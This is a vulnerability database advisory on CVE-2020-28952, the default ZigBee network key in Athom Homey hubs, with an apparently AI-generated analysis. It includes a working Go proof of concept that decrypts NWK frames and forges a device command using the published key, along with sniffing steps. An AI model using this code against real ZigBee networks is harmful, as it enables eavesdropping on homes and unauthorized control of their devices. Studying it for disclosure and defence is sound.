VYPR
Unrated severity · NVD Advisory · Published Mar 9, 2021 · Updated Aug 4, 2024

CVE-2020-28952

Description

An issue was discovered on Athom Homey and Homey Pro devices before 5.0.0. ZigBee hub devices should generate a unique Standard Network Key that is then exchanged with all enrolled devices so that all inter-device communication is encrypted. However, the cited Athom products use another widely known key that is designed for testing purposes: "01030507090b0d0f00020406080a0c0d" (the decimal equivalent of 1 3 5 7 9 11 13 15 0 2 4 6 8 10 12 13), which is human generated and static across all issued devices.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Athom Homey and Homey Pro devices before 5.0.0 use a static, well-known ZigBee network key, allowing attackers to decrypt all inter-device communication.

Vulnerability

Athom Homey and Homey Pro devices prior to version 5.0.0 use a static, well-known ZigBee Standard Network Key for encrypting inter-device communication. The key is the hexadecimal string 01030507090b0d0f00020406080a0c0d (the byte sequence 1, 3, 5, 7, 9, 11, 13, 15, 0, 2, 4, 6, 8, 10, 12, 13), a human-generated value that is identical across all issued devices [2]. It is a published testing key (it is, for example, the long-standing default network key of Zigbee2MQTT and similar ZigBee tooling) rather than a value generated per hub, so once shipped in production firmware it provides no secrecy at all: every affected installation shares the same key, and that key is public.

Exploitation

An attacker within ZigBee radio range can capture the network's encrypted traffic with a ZigBee sniffer (e.g., a CC25xx-based receiver and the KillerBee suite) [2]. Because the network key is static and publicly known, the captured frames decrypt without any authentication, prior access, or interaction with the hub: the attacker only has to find the channel the network uses (one of the IEEE 802.15.4 channels 11 to 26), capture frames, and supply the key to a decoder such as Wireshark's ZigBee NWK dissector. On a network with a properly generated key the attacker would instead have to be present to capture the key-transport frame sent when a device joins; here no such opportunity is needed. No user interaction is required.

Impact

Successful decryption reveals all ZigBee communication between the hub and its enrolled devices, including sensor readings, device commands, and configuration messages. The loss goes beyond confidentiality: ZigBee NWK-layer security is AES-CCM*, which derives both the keystream and the frame integrity code (MIC) from the same network key, so an attacker holding the key can also build frames that pass the integrity check. Plain replay of a captured command is limited by the NWK frame counter (a receiver drops frames whose counter does not exceed the last one it saw from that source), but a key holder simply constructs a fresh frame with a higher counter, which gives unauthorized control of enrolled devices (for instance an On/Off command to a switch). The compromise therefore affects the confidentiality and integrity of the entire ZigBee network.
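The capture-and-decrypt step described under Exploitation and the forging risk described under Impact, as an added, self-contained example; this is not code from the advisory, from Athom, or from the cited references. It is a Go model of ZigBee NWK-layer security (AES-128-CCM* at security level 5, ENC-MIC-32, with the nonce built from source extended address, frame counter and security control byte) using the default key from this CVE. CCM* is written out on top of crypto/aes because the Go standard library has no CCM mode. The block secures a constructed On/Off "On" command the way a hub would, shows that a sniffer holding nothing but the published key recovers the plaintext, that a different key fails the MIC check, and that the same key lets an attacker forge an "Off" command with a fresher frame counter that passes the receiver's check. Assumptions: the sample NWK header (8 bytes, short addresses, security bit set), the APS/ZCL payload bytes and the hub IEEE address are constructed, not captured; the auxiliary header uses key sequence number 0; the security level bits of the control byte are sent as zero and restored by the receiver, as the NWK security procedure specifies.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
)

// The well-known ZigBee test network key named in the advisory.
var DefaultNetworkKey, _ = hex.DecodeString("01030507090b0d0f00020406080a0c0d")

// NWK security level 5 (ENC-MIC-32): AES-128-CCM*, 13-byte nonce, 4-byte MIC, L=2.
const micLen, secControl = 4, 5 | 1<<3 | 1<<5 // control byte: level 5 | key id 1 (network key) | extended nonce
const hdrLen, auxLen = 8, 14                  // sample NWK header (short addresses) and aux header lengths

// cbcMAC computes the CCM* tag T over the length-prefixed header a and the payload m,
// each zero-padded to whole blocks.
func cbcMAC(blk cipher.Block, nonce, a, m []byte) []byte {
	x := append(append([]byte{0x40 | byte((micLen-2)/2)<<3 | 1}, nonce...), 0, 0) // B0: flags||nonce||len(m)
	binary.BigEndian.PutUint16(x[14:], uint16(len(m)))
	blk.Encrypt(x, x)
	for _, blocks := range [][]byte{append([]byte{byte(len(a) >> 8), byte(len(a))}, a...), m} {
		for i := 0; i < len(blocks); i += 16 {
			for j := 0; j < 16 && i+j < len(blocks); j++ {
				x[j] ^= blocks[i+j]
			}
			blk.Encrypt(x, x)
		}
	}
	return x[:micLen]
}

// ctr XORs in with the keystream blocks S_start, S_start+1, ...; it is its own inverse.
func ctr(blk cipher.Block, nonce []byte, start uint16, in []byte) []byte {
	out, s := make([]byte, len(in)), make([]byte, 16)
	a := append(append([]byte{1}, nonce...), 0, 0) // A_i: flags (L'=1) || nonce || i
	for i := range in {
		if i%16 == 0 {
			binary.BigEndian.PutUint16(a[14:], start+uint16(i/16))
			blk.Encrypt(s, a)
		}
		out[i] = in[i] ^ s[i%16]
	}
	return out
}

// ccmStar seals a payload (open=false: returns ciphertext||MIC) or opens ciphertext||MIC.
func ccmStar(key, nonce, a, in []byte, open bool) ([]byte, error) {
	blk, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if !open {
		u := ctr(blk, nonce, 0, cbcMAC(blk, nonce, a, in)) // U = T xor S0
		return append(ctr(blk, nonce, 1, in), u...), nil
	}
	m := ctr(blk, nonce, 1, in[:len(in)-micLen])
	if !bytes.Equal(ctr(blk, nonce, 0, in[len(in)-micLen:]), cbcMAC(blk, nonce, a, m)) {
		return nil, errors.New("MIC check failed: wrong network key or tampered frame")
	}
	return m, nil
}

// nonce = source ext addr || frame counter (LE) || security control with the real level restored.
func nonce(aux []byte) []byte {
	return append(append(append([]byte{}, aux[5:13]...), aux[1:5]...), aux[0]|secControl&7)
}

// Secure returns the wire frame header||aux||ciphertext||MIC that a hub, or anyone holding the
// key, transmits. The level bits of the aux header go out as 000, as the NWK layer sends them.
func Secure(key, header []byte, fc uint32, src [8]byte, payload []byte) ([]byte, error) {
	aux := append(append([]byte{secControl, byte(fc), byte(fc >> 8), byte(fc >> 16), byte(fc >> 24)}, src[:]...), 0)
	body, err := ccmStar(key, nonce(aux), append(append([]byte{}, header...), aux...), payload, false)
	aux[0] &^= 0x07
	return append(append(append([]byte{}, header...), aux...), body...), err
}

// Unsecure is what a receiver, or a sniffer that holds the key, does with a wire frame.
func Unsecure(key, frame []byte) ([]byte, error) {
	if len(frame) < hdrLen+auxLen+micLen {
		return nil, errors.New("frame too short")
	}
	aad := append([]byte{}, frame[:hdrLen+auxLen]...)
	aad[hdrLen] |= secControl & 7 // restore nwkSecurityLevel before authenticating
	return ccmStar(key, nonce(aad[hdrLen:]), aad, frame[hdrLen+auxLen:], true)
}

// Constructed sample, not a real capture: NWK header hub 0x0000 -> device 0x1234 (security bit set)
// carrying an APS/ZCL On/Off "On" command (cluster 0x0006, command 0x01); hub IEEE address assumed.
var (
	SampleHeader = []byte{0x08, 0x02, 0x34, 0x12, 0x00, 0x00, 0x1e, 0x42}
	SampleOn     = []byte{0x00, 0x01, 0x06, 0x00, 0x04, 0x01, 0x01, 0x07, 0x01, 0x10, 0x01}
	HubAddr      = [8]byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}
)

func main() {
	f, _ := Secure(DefaultNetworkKey, SampleHeader, 7, HubAddr, SampleOn)
	p, err := Unsecure(DefaultNetworkKey, f) // a sniffer needs nothing but the published key
	forged, _ := Secure(DefaultNetworkKey, SampleHeader, 8, HubAddr, append(SampleOn[:10:10], 0x00)) // "Off", fresher counter
	_, ferr := Unsecure(DefaultNetworkKey, forged)                                                   // the key yields a valid MIC too
	fmt.Printf("on air: %x\nwith default key: %x (%v)\nforged Off accepted: %v\n", f, p, err, ferr == nil)
}
```

Decrypting a real capture works the same way in Wireshark: add the key under the ZigBee NWK protocol preferences and the NWK-secured frames dissect in clear. The forged frame is accepted because CCM* derives both the keystream and the MIC from the one network key; a network key generated uniquely per hub, which is what the 5.0.0 fix is meant to provide, makes both the decryption and the forgery fail.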

Mitigation

Athom addressed the issue in firmware version 5.0.0. Users should update their Homey or Homey Pro devices to the latest firmware. The advisory does not say whether the update rotates the network key of an already-formed ZigBee network or whether the network must be re-formed (devices re-paired) to obtain a freshly generated key; after updating, confirm that the key in use is no longer the default value above. No workaround exists for unpatched devices. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities catalog as of the publication date.

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 3

Patches: 0 (no patches discovered yet)

Vulnerability mechanics: AI mechanics synthesis has not run for this CVE yet.

References: 3

News mentions: 0 (no linked articles in our index yet)